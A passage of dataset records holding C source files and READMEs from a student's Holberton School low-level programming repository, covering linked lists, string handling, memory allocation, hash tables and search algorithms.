1)\n\t{\n\t\tstart_n = start_n->next;\n\t\tprintf(\"Value checked at index [%d] = [%d]\\n\", (int) (size - 1), end_n->n);\n\t\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) start,\n\t\t (int) (size - 1));\n\t\treturn (linear_mod(start_n, start, size - 1, value));\n\t}\n\n\tprintf(\"Value found between indexes [%d] and [%d]\\n\", (int) (end - block_s),\n\t (int) (end));\n\treturn (linear_mod(start_n, start, end, value));\n}\n" }, { "alpha_fraction": 0.8045454621315002, "alphanum_fraction": 0.8045454621315002, "avg_line_length": 30.428571701049805, "blob_id": "ed5690f41bccd74a83b3478a7d95256255087bf6", "content_id": "10d2c2e0823c37e42f3e590694e4a07e2c5d0f00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 220, "license_type": "no_license", "max_line_length": 55, "num_lines": 7, "path": "/0x10-variadic_functions/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about Variadic Functions\n\nHave different task in orther to learn about this topic\n\nWhat are variadic functions\nHow to use va_start, va_arg and va_end macros\nWhy and how to use the const type qualifier\n" }, { "alpha_fraction": 0.6147859692573547, "alphanum_fraction": 0.6147859692573547, "avg_line_length": 14.117647171020508, "blob_id": "19bd6e2ad97d384d214babfb2847192f637d7b36", "content_id": "e82bdb5f7b152c37043059bace13332eb48d40c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 257, "license_type": "no_license", "max_line_length": 41, "num_lines": 17, "path": "/0x13-more_singly_linked_lists/4-free_listint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * free_listint - frees a listint_t list.\n * @head: pointer to first node.\n */\nvoid free_listint(listint_t *head)\n{\n\tlistint_t *cursor;\n\n\twhile (head != NULL)\n\t{\n\t\tcursor = head;\n\t\thead = head->next;\n\t\tfree(cursor);\n\t}\n\tfree(head);\n}\n" }, { "alpha_fraction": 0.4416666626930237, "alphanum_fraction": 0.510185182094574, "avg_line_length": 19.769229888916016, "blob_id": "5fc9c9acfbe0fa0beb0e259aef7d24cee95212a9", "content_id": "8ac4851c05361dccb317397f91f155c1d4075df0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1080, "license_type": "no_license", "max_line_length": 72, "num_lines": 52, "path": "/0x06-pointers_arrays_strings/102-infinite_add.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * infinite_add - add two numbers\n * @n1: first number.\n * @n2: second number.\n * @r: buffer for resutl.\n * @size_r: buffer for operation.\n * Return: pointer to the result.\n */\nchar *infinite_add(char *n1, char *n2, char *r, int size_r)\n{\n\tint leng_1 = 0, leng_2 = 0, higher, carry = 0, add, add_1, add_2;\n\n\tfor (leng_1 = 0; n1[leng_1] != '\\0'; leng_1++)\n\t\t;\n\tfor (leng_2 = 0; n2[leng_2] != '\\0'; leng_2++)\n\t\t;\n\tif (leng_1 > leng_2)\n\t\thigher = leng_1;\n\telse\n\t\thigher = leng_2;\n\tif (size_r <= (higher + 1))\n\t\treturn (0);\n\tr[higher + 1] = '\\0';\n\tleng_1--, leng_2--, add_1 = n1[leng_1] - '0', add_2 = n2[leng_2] - '0';\n\twhile (higher >= 0)\n\t{\n\t\tadd = add_1 + add_2 + carry;\n\t\tif (add >= 10)\n\t\t\tcarry = add / 10;\n\t\telse\n\t\t\tcarry = 0;\n\t\tif (add > 0)\n\t\t\tr[higher] = (add % 10) + '0';\n\t\telse\n\t\t\tr[higher] = '0';\n\t\tif (leng_1 > 0)\n\t\t\tleng_1--, add_1 = n1[leng_1] - '0';\n\t\telse\n\t\t\tadd_1 = 0;\n\t\tif (leng_2 > 0)\n\t\t\tleng_2--, add_2 = n2[leng_2] - '0';\n\t\telse\n\t\t\tadd_2 = 0;\n\t\thigher--;\n\t}\n\tif (*(r) == '0')\n\t\treturn (r + 1);\n\telse\n\t\treturn (r);\n}\n" }, { "alpha_fraction": 0.7828282713890076, "alphanum_fraction": 0.7828282713890076, "avg_line_length": 23.75, "blob_id": "df882a452108addb580a68acb495dd0bf27d6a04", "content_id": "f714fc4e1f88ced284c7249d6e9b5399a4d64038", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 198, "license_type": "no_license", "max_line_length": 73, "num_lines": 8, "path": "/0x13-more_singly_linked_lists/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### Singly linked lists\n\nThis repository is about singly linked lists\n\nGeneral learning purpose:\n\n- How to use linked lists\n- Start to look for the right source of information without too much help\n" }, { "alpha_fraction": 0.8108108043670654, "alphanum_fraction": 0.8108108043670654, "avg_line_length": 74, "blob_id": "ac5fef8cc794e40b150fc5c727eb0e94e6020f96", "content_id": "e095eb5f63f5168205bd19f3bbad460abcf0125f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 74, "license_type": "no_license", "max_line_length": 74, "num_lines": 1, "path": "/0x07-pointers_arrays_strings/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "this is a project for functions of C libraries, using pointers and arrays." }, { "alpha_fraction": 0.33142855763435364, "alphanum_fraction": 0.37142857909202576, "avg_line_length": 12.125, "blob_id": "025f4da0f94117df8f0fee5779ce0ddd4a03c0a0", "content_id": "8d17189ee220a4a4bfca86d44f34af1c06e18002", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 525, "license_type": "no_license", "max_line_length": 58, "num_lines": 40, "path": "/0x02-functions_nested_loops/9-times_table.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * times_table - prints the 9 times table, starting with 0\n *\n *\n */\n\nvoid times_table(void)\n{\n\tint r, m, d, fd;\n\n\tfor (m = 0; m <= 9; m++)\n\t{\n\t\tfor (d = 0; d <= 9; d++)\n\t\t{\n\t\t\tr = m * d;\n\t\t\tif (r < 10)\n\t\t\t{\n\t\t\t\tif (!(d == 0))\n\t\t\t\t{\n\t\t\t\t\t_putchar(' ');\n\t\t\t\t}\n\t\t\t\t_putchar('0' + r);\n\t\t\t}\n\t\t\telse if (r >= 10)\n\t\t\t{\n\t\t\t\tfd = (r / 10) % 10;\n\t\t\t\tr = r % 10;\n\t\t\t\t_putchar('0' + fd);\n\t\t\t\t_putchar('0' + r);\n\t\t\t}\n\t\t\tif (!(d == 9))\n\t\t\t{\n\t\t\t\t_putchar(',');\n\t\t\t\t_putchar(' ');\n\t\t\t}\n\t\t}\n\t\t_putchar('\\n');\n\t}\n}\n" }, { "alpha_fraction": 0.7569526433944702, "alphanum_fraction": 0.7830777168273926, "avg_line_length": 136.97674560546875, "blob_id": "9481be973f8ade0369e5cae1b9add10e93c40924", "content_id": "e4fc0be5f3f0f83f2cc4c519394991da5359732a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5933, "license_type": "no_license", "max_line_length": 292, "num_lines": 43, "path": "/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "# Low-level Programming\n\nThis is the module of Low-level Programming, created during Full Stack Software Engineering program at Holberton School, this module aims to understand how programming languages and Unix system work, basically **what is going on under the hood**, whit a strong focus in developing algorithms.\n\n## Technologies:\n\n- **C Programming** C90 Standard\n- **Bash scripts**\n- Tested on **Ubuntu 14.04 LTS**\n- Compiler **gcc 4.8.4**\n\n## Projects:\n\n| Project name | Description |\n| ------------ | ----------- |\n| [`0x00-hello_world`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x00-hello_world) | Introducton to C Programming Language and compiling basics with gcc |\n| [`0x01-variables_if_else_while`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x01-variables_if_else_while) | Loops and Conditions |\n| [`0x02-functions_nested_loops`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x02-functions_nested_loops) | Function prototypes and nested loops in **C** |\n| [`0x03-debugging`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x03-debugging) | Code Debugging Challenge |\n| [`0x04-more_functions_nested_loops`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x04-more_functions_nested_loops) | Nested Loops and basic algorithms |\n| [`0x05-pointers_arrays_strings`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x05-pointers_arrays_strings) | Pointers data type, Array and String, declaration and handling |\n| [`0x06-pointers_arrays_strings`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x06-pointers_arrays_strings) | Pointers data type, Array and String, declaration and handling |\n| [`0x07-pointers_arrays_strings`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x07-pointers_arrays_strings) | Pointers data type, Array and String, declaration and handling |\n| [`0x08-recursion`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x08-recursion) | Algorithms with recursion functions |\n| [`0x09-static_libraries`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x09-static_libraries) | Using static libraries, creating, compaling and using in **C** |\n| [`0x0A-argc_argv`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0A-argc_argv) | Argument count and argument vector, command line features |\n| [`0x0B-malloc_free`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0B-malloc_free) | Dynamic Memory allocation, using malloc in C |\n| [`0x0C-more_malloc_free`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0C-more_malloc_free) | Dynamic Memory allocation, using malloc in C |\n| [`0x0D-preprocessor`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0D-preprocessor) | Using Macros and preprocessor compilation's step |\n| [`0x0E-structures_typedef`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0E-structures_typedef) | C structures data type, data type definition |\n| [`0x0F-function_pointers`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x0F-function_pointers) | Pointer to function declaration and usage |\n| [`0x10-variadic_functions`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x10-variadic_functions) | Using variadic functions |\n| [`0x12-singly_linked_lists`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x12-singly_linked_lists) | Linked list data type paradigm |\n| [`0x13-more_singly_linked_lists`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x13-more_singly_linked_lists) | Linked list data type paradigm |\n| [`0x14-bit_manipulation`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x14-bit_manipulation) | Using bitwise operators with variables, low-level binary handling |\n| [`0x15-file_io`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x15-file_io) | Using File input and output, using file descriptors and open, write, read functions |\n| [`0x17-doubly_linked_lists`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x17-doubly_linked_lists) | Using double Linked list data type in algorithms |\n| [`0x18-dynamic_libraries`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x18-dynamic_libraries) | Using dynamic libraries, creating, compaling and using in **C** |\n| [`0x1A-hash_tables`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1A-hash_tables) | Using Hash tables, double linked list, introduction to hash algorithms with **C** |\n| [`0x1B-sorting_algorithms`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1B-sorting_algorithms) | Computer Science sorting algorithms in **C** |\n| [`0x1C-makefiles`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1C-makefiles) | Using makefiles feature with **C** |\n| [`0x1D-binary_trees`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1D-binary_trees) | Binary tree data structure, Algorithms to sort and create **C**, this project use a lot of Dinamic Memory functions and complex recursive algorithms |\n| [`0x1E-search_algorithms`](https://github.com/david-develop/holbertonschool-low_level_programming/tree/master/0x1E-search_algorithms) | Search algorithm is any algorithm which solves the search problem, using the space complexity concept |\n" }, { "alpha_fraction": 0.5414634346961975, "alphanum_fraction": 0.5560975670814514, "avg_line_length": 17.08823585510254, "blob_id": "68b00f132bca7d46ff578bafa244cb2e43e2d635", "content_id": "02f5f3e27e18bc3f40855d354ebd46cbee74453e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 615, "license_type": "no_license", "max_line_length": 70, "num_lines": 34, "path": "/0x0A-argc_argv/4-add.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <ctype.h>\n/**\n * main - program thar print the multiplication result of two numbers.\n * @argc: argument count.\n * @argv: argument vector.\n * Return: 1 if program doesn't recive two arguments, otherwise 0.\n */\n\nint main(int argc, char *argv[])\n{\n\tint i, array_i;\n\tint sum = 0;\n\n\t(void)argv;\n\tif (argc > 1)\n\t{\n\t\tfor (i = 1; i < argc; i++)\n\t\t{\n\t\t\tfor (array_i = 0; argv[i][array_i] != '\\0'; array_i++)\n\t\t\t{\n\t\t\t\tif (!isdigit(argv[i][array_i]))\n\t\t\t\t{\n\t\t\t\t\tprintf(\"Error\\n\");\n\t\t\t\t\treturn (1);\n\t\t\t\t}\n\t\t\t}\n\t\t\tsum += atoi(argv[i]);\n\t\t}\n\t}\n\tprintf(\"%d\\n\", sum);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.5693069100379944, "alphanum_fraction": 0.5693069100379944, "avg_line_length": 12.466666221618652, "blob_id": "c690feec7e144b431355138a1e26dc5777ba6028", "content_id": "66b924853be158b8c1f223471ccbb603f8d09f2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 202, "license_type": "no_license", "max_line_length": 29, "num_lines": 15, "path": "/0x02-functions_nested_loops/10-add.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * add - add two integers.\n * @a: first input value.\n * @b: second input value.\n * Return: the result of sum.\n */\n\nint add(int a, int b)\n{\n\tint r;\n\n\tr = a + b;\n\treturn (r);\n}\n" }, { "alpha_fraction": 0.4876847267150879, "alphanum_fraction": 0.5295566320419312, "avg_line_length": 15.916666984558105, "blob_id": "8248a3d2c097521af97ce9f3eb54c61781672f3d", "content_id": "90b914fa72d87ea514d0658a5d1ee96b92ec34c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 406, "license_type": "no_license", "max_line_length": 73, "num_lines": 24, "path": "/0x06-pointers_arrays_strings/3-strcmp.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _strcmp - compare the strings\n * @s1: the firts input string.\n * @s2: the second input string.\n * Return: if strings are the same 0, if not the difference between both.\n */\nint _strcmp(char *s1, char *s2)\n{\n\tint i = 0;\n\n\twhile ((s1[i] != '\\0' && s2[i] != '\\0') && (s1[i] == s2[i]))\n\t{\n\t\ti++;\n\t}\n\tif (s1[i] == s2[i])\n\t{\n\t\treturn (0);\n\t}\n\telse\n\t{\n\t\treturn (s1[i] - s2[i]);\n\t}\n}\n" }, { "alpha_fraction": 0.5082873106002808, "alphanum_fraction": 0.519336998462677, "avg_line_length": 10.3125, "blob_id": "e66f543c2f1e20170816fb9b28d9f623a7c77c94", "content_id": "4763496f93294dca3cc7fc90a3d7abd87db08d89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 181, "license_type": "no_license", "max_line_length": 38, "num_lines": 16, "path": "/0x04-more_functions_nested_loops/3-print_numbers.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_numbers - Prints the numbers.\n *\n */\n\nvoid print_numbers(void)\n{\n\tchar a;\n\n\tfor (a = '0'; a <= '9'; a++)\n\t{\n\t\t_putchar(a);\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.8507462739944458, "alphanum_fraction": 0.8507462739944458, "avg_line_length": 26, "blob_id": "2123f3aaf591595c904be5c6e780852d86e041f3", "content_id": "67ac9d26002b690f1ab38644c8001183544b441e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 134, "license_type": "no_license", "max_line_length": 91, "num_lines": 5, "path": "/0x03-debugging/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This folder contains different debugged file, as part of the development of debbugin skills\n\nComments\nAnalisis\nBetty style corrections" }, { "alpha_fraction": 0.530351459980011, "alphanum_fraction": 0.5399361252784729, "avg_line_length": 15.473684310913086, "blob_id": "e1ce91dd993d80c51ad49c2b0cfd07927c44eaf4", "content_id": "4407885a49e95ff26a3e18322647c67335547820", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 313, "license_type": "no_license", "max_line_length": 53, "num_lines": 19, "path": "/0x06-pointers_arrays_strings/4-rev_array.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * reverse_array - print the given string in reverse.\n * @a: input array.\n * @n: number of arrays.\n */\nvoid reverse_array(int *a, int n)\n{\n\tint iter, last_i, in;\n\n\tfor (iter = 0; iter < n; iter++)\n\t{\n\t\tin = a[iter];\n\t\tlast_i = a[n - 1];\n\t\ta[iter] = last_i;\n\t\ta[n - 1] = in;\n\t\tn--;\n\t}\n}\n" }, { "alpha_fraction": 0.49886104464530945, "alphanum_fraction": 0.5261958837509155, "avg_line_length": 19.904762268066406, "blob_id": "898c32ebf5cf6cae0c2b17cbe78c742ce6fe95a1", "content_id": "f2aa8e6ab1bb9abc998ef4af56499bb2561ccbd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 439, "license_type": "no_license", "max_line_length": 75, "num_lines": 21, "path": "/0x07-pointers_arrays_strings/8-print_diagsums.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * print_diagsums - prints the sum of the two diagonals of a square matrix.\n * @a: input matrix.\n * @size: size of the matrix.\n */\nvoid print_diagsums(int *a, int size)\n{\n\tint i, sum_1 = 0, sum_2 = 0;\n\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tsum_1 += a[(i * size) + i];\n\t}\n\tfor (i = (size - 1); i < ((size * size) - 1); i = i + (size - 1))\n\t{\n\t\tsum_2 += a[i];\n\t}\n\tprintf(\"%d, %d\\n\", sum_1, sum_2);\n}\n" }, { "alpha_fraction": 0.5745967626571655, "alphanum_fraction": 0.5786290168762207, "avg_line_length": 16.714284896850586, "blob_id": "d4f7b9bac7c4d3f50910dab2997f1a5e5d6d50a2", "content_id": "f2865a3672e28207e46193c90c252332bf4d96ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 496, "license_type": "no_license", "max_line_length": 46, "num_lines": 28, "path": "/0x0C-more_malloc_free/3-array_range.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * array_range - creates an array of integers.\n * @min: minimun value.\n * @max: max value.\n * Return: Pointer to allocated memory.\n */\nint *array_range(int min, int max)\n{\n\tint *arr_i = NULL;\n\tint i, rang_arr;\n\n\tif (min > max)\n\t\treturn (NULL);\n\n\trang_arr = max - min + 1;\n\n\tarr_i = malloc(sizeof(int) * (rang_arr));\n\tif (arr_i == NULL)\n\t\treturn (NULL);\n\tfor (i = 0; min < max; i++, min++)\n\t{\n\t\tarr_i[i] = min;\n\t}\n\tarr_i[i] = max;\n\treturn (arr_i);\n}\n" }, { "alpha_fraction": 0.8131868243217468, "alphanum_fraction": 0.8131868243217468, "avg_line_length": 90, "blob_id": "f427031d592db9f8e1fe47c77506a6e539ffd41a", "content_id": "efa036cfb492d1d0e31c3f294d4678e907855e34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "no_license", "max_line_length": 90, "num_lines": 1, "path": "/0x0A-argc_argv/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository contain the projects concerning to the use of argc and argv in C programs. " }, { "alpha_fraction": 0.6532507538795471, "alphanum_fraction": 0.6594427227973938, "avg_line_length": 18, "blob_id": "b11c23d87c8a7c3b7fe2686a6fac0a94ae991ab1", "content_id": "e5e0b7bed98bd72d2e78e78668ca267e7f1a55b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 323, "license_type": "no_license", "max_line_length": 64, "num_lines": 17, "path": "/0x0C-more_malloc_free/0-malloc_checked.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * malloc_checked - function that allocates memory using malloc.\n * @b: space requested.\n * Return: Pointer to allocated memory.\n */\nvoid *malloc_checked(unsigned int b)\n{\n\tvoid *mem_ad = NULL;\n\n\tmem_ad = malloc(b);\n\tif (mem_ad == NULL)\n\t\texit(98);\n\telse\n\t\treturn (mem_ad);\n}\n" }, { "alpha_fraction": 0.5372549295425415, "alphanum_fraction": 0.5503268241882324, "avg_line_length": 17.214284896850586, "blob_id": "837c1c1a0de6086e483f72e8c0bbcf91c85caddc", "content_id": "5f9c90344082d1e40f25012c50a8eea6b8c1af41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 765, "license_type": "no_license", "max_line_length": 71, "num_lines": 42, "path": "/0x0B-malloc_free/3-alloc_grid.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * alloc_grid - returns a pointer to a 2 dimensional array of integers.\n * @width: width of the matrix.\n * @height: height of the matrix.\n * Return: Pointer to a 2 dimensional array of integrers.\n */\nint **alloc_grid(int width, int height)\n{\n\tint **grid_a;\n\tint i, j, k;\n\n\tif (width <= 0 || height <= 0)\n\t\treturn (NULL);\n\n\tgrid_a = malloc(height * sizeof(int *));\n\n\tif (grid_a == NULL)\n\t{\n\t\treturn (NULL);\n\t}\n\n\tfor (i = 0; i < height; i++)\n\t{\n\t\tgrid_a[i] = malloc(width * sizeof(int));\n\t\tif (grid_a[i] == NULL)\n\t\t{\n\t\t\tfor (k = i - 1; k >= 0; k--)\n\t\t\t\tfree(grid_a[k]);\n\t\t\tfree(grid_a);\n\t\t\treturn (NULL);\n\t\t}\n\t}\n\n\tfor (i = 0; i < height; i++)\n\t{\n\t\tfor (j = 0; j < width; j++)\n\t\t\tgrid_a[i][j] = 0;\n\t}\n\treturn (grid_a);\n}\n" }, { "alpha_fraction": 0.48767122626304626, "alphanum_fraction": 0.501369833946228, "avg_line_length": 13.600000381469727, "blob_id": "3f44f4473979f810b61db297455749bbbc83bf38", "content_id": "852b083146a60edd99eb9d3ca0820244432b2af8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 365, "license_type": "no_license", "max_line_length": 50, "num_lines": 25, "path": "/0x05-pointers_arrays_strings/5-rev_string.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * rev_string - print the given string in reverse.\n * @s: input string.\n *\n */\nvoid rev_string(char *s)\n{\n\tint i = 0, iter;\n\tchar last_d, c;\n\n\t/*count the lenght of the string*/\n\twhile (*(s + i) != '\\0')\n\t{\n\t\ti++;\n\t}\n\tfor (iter = 0; iter < i; iter++)\n\t{\n\t\tc = s[iter];\n\t\tlast_d = s[i - 1];\n\t\ts[iter] = last_d;\n\t\ts[i - 1] = c;\n\t\ti--;\n\t}\n}\n" }, { "alpha_fraction": 0.6409090757369995, "alphanum_fraction": 0.6409090757369995, "avg_line_length": 22.157894134521484, "blob_id": "73bae53abe1c317cc282e099750cfee753a57c2b", "content_id": "4ea0e70d580e26698cd7a3749864897218f1d49b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 440, "license_type": "no_license", "max_line_length": 70, "num_lines": 19, "path": "/0x13-more_singly_linked_lists/2-add_nodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * add_nodeint - adds a new node at the beginning of a listint_t list.\n * @head: pointer to first node.\n * @n: given int to be added.\n * Return: the address of the new element, or NULL if it failed.\n */\nlistint_t *add_nodeint(listint_t **head, const int n)\n{\n\tlistint_t *temp;\n\n\ttemp = malloc(sizeof(listint_t));\n\tif (temp == NULL)\n\t\treturn (NULL);\n\ttemp->n = n;\n\ttemp->next = *head;\n\t*head = temp;\n\treturn (temp);\n}\n" }, { "alpha_fraction": 0.5542635917663574, "alphanum_fraction": 0.565891444683075, "avg_line_length": 13.333333015441895, "blob_id": "6b25c66791bda4d541817ced5582415035acf649", "content_id": "65d8c7d6560388b8472fb86362a09e6d694a6b28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 258, "license_type": "no_license", "max_line_length": 48, "num_lines": 18, "path": "/0x04-more_functions_nested_loops/0-isupper.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _isupper - Verify if the letter is uppercase.\n * @c: variable for input value.\n * Return: 1 when input is a uppercase letter.\n */\n\nint _isupper(int c)\n{\n\tif (c >= 'A' && c <= 'Z')\n\t{\n\t\treturn (1);\n\t}\n\telse\n\t{\n\t\treturn (0);\n\t}\n}\n" }, { "alpha_fraction": 0.8390804529190063, "alphanum_fraction": 0.8390804529190063, "avg_line_length": 43, "blob_id": "e8f4eb5b688fe2c60966ce2d14fb4db4f194bd99", "content_id": "715af68801d9ab26c7bdb75c8bfc99ef4a083122", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 79, "num_lines": 2, "path": "/0x00-hello_world/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This project is about the basics of C programming, specialy compilation process\n#CISFUN" }, { "alpha_fraction": 0.6214421391487122, "alphanum_fraction": 0.6280834674835205, "avg_line_length": 21.4255313873291, "blob_id": "abf1b2c6eff73aa6e09f354c395ddb5b8a07c3e2", "content_id": "7145838bd392a3ca94cc23e2a418ae1d9f0f253d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1054, "license_type": "no_license", "max_line_length": 72, "num_lines": 47, "path": "/0x1A-hash_tables/3-hash_table_set.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"hash_tables.h\"\n\n/**\n * hash_table_set - function that adds an element to the hash table.\n * @ht: hash table to add or update the key/value\n * @key: key value to add or update.\n * @value: value associated with the key.\n * Return: 1 if it succeeded, 0 otherwise.\n */\n\nint hash_table_set(hash_table_t *ht, const char *key, const char *value)\n{\n\thash_node_t *new_node;\n\thash_node_t *temp;\n\thash_node_t *cursor;\n\tunsigned long int index;\n\n\tif (ht == NULL || key == NULL)\n\t\treturn (0);\n\n\tindex = key_index((const unsigned char *)key, ht->size);\n\n\tfor (cursor = ht->array[index]; cursor != NULL; cursor = cursor->next)\n\t{\n\t\tif (strcmp(cursor->key, key) == 0)\n\t\t{\n\t\t\tfree(cursor->value);\n\t\t\tcursor->value = strdup(value);\n\t\t\treturn (1);\n\t\t}\n\t}\n\n\tnew_node = malloc(sizeof(hash_node_t));\n\tif (new_node == NULL)\n\t\treturn (0);\n\tnew_node->key = strdup(key);\n\tnew_node->value = strdup(value);\n\tif (ht->array[index] == NULL)\n\t\tnew_node->next = NULL;\n\telse\n\t{\n\t\ttemp = ht->array[index];\n\t\tnew_node->next = temp;\n\t}\n\tht->array[index] = new_node;\n\treturn (1);\n}\n" }, { "alpha_fraction": 0.8241758346557617, "alphanum_fraction": 0.8241758346557617, "avg_line_length": 90, "blob_id": "7020a6367c6af883af048da28c9925899e669063", "content_id": "26500a7fa96ae4b3654c22b5a23ff823593b925f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 108, "num_lines": 2, "path": "/0x04-more_functions_nested_loops/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This project is about the use of nested loops using prototype functions.\nPrograms that prints diferente figures, like triangles, squares, inverted triangles and other type of loops.\n" }, { "alpha_fraction": 0.4826546013355255, "alphanum_fraction": 0.5143288373947144, "avg_line_length": 14.068181991577148, "blob_id": "8616fb998635d1b7e1aa4468b5e6ea90d0a43618", "content_id": "9b0f565c4b92d5b6cb9a2484142589f56a0887a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 663, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/0x0F-function_pointers/3-main.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"function_pointers.h\"\n#include \"3-calc.h\"\n#include <stdlib.h>\n#include <stdio.h>\n/**\n * main - performs simple operations.\n * @argc: argument count.\n * @argv: argument vector.\n * Return: Always 0.\n */\n\nint main(int argc, char *argv[])\n{\n\tint num1, num2, calc;\n\tchar *op;\n\n\tif (argc != 4)\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(98);\n\t}\n\n\tnum1 = atoi(argv[1]);\n\tnum2 = atoi(argv[3]);\n\top = 